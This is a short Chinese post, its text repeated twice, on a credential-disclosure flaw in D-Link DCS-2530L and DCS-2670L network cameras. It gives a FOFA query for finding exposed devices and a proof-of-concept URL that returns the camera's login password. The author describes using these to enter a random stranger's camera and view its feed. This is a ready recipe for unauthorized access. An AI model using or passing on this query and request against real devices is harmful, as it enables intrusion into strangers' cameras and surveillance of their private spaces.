D-Link DCS-2530L和DCS-2670L存在监控信息泄露漏洞,此漏洞利用如此简单,危害如此之大,不禁让人惊叹恐怖如斯。
fofa搜索: app="D_LINK_DCS_2530L"
随便进入一个,是登录界面,需要登录口令:
POC如下:
http://xx.xx.xx.xx/config/getuser?index=0
直接可以读取到监控页面的账户密码
接下来回到刚才的登陆界面正常输入口令即可进入
看了几秒就不敢看了,这玩意太可怕了。。
D-Link DCS-2530L和DCS-2670L存在监控信息泄露漏洞,此漏洞利用如此简单,危害如此之大,不禁让人惊叹恐怖如斯。
fofa搜索: app="D_LINK_DCS_2530L"
随便进入一个,是登录界面,需要登录口令:
POC如下:
http://xx.xx.xx.xx/config/getuser?index=0
直接可以读取到监控页面的账户密码
接下来回到刚才的登陆界面正常输入口令即可进入
看了几秒就不敢看了,这玩意太可怕了。。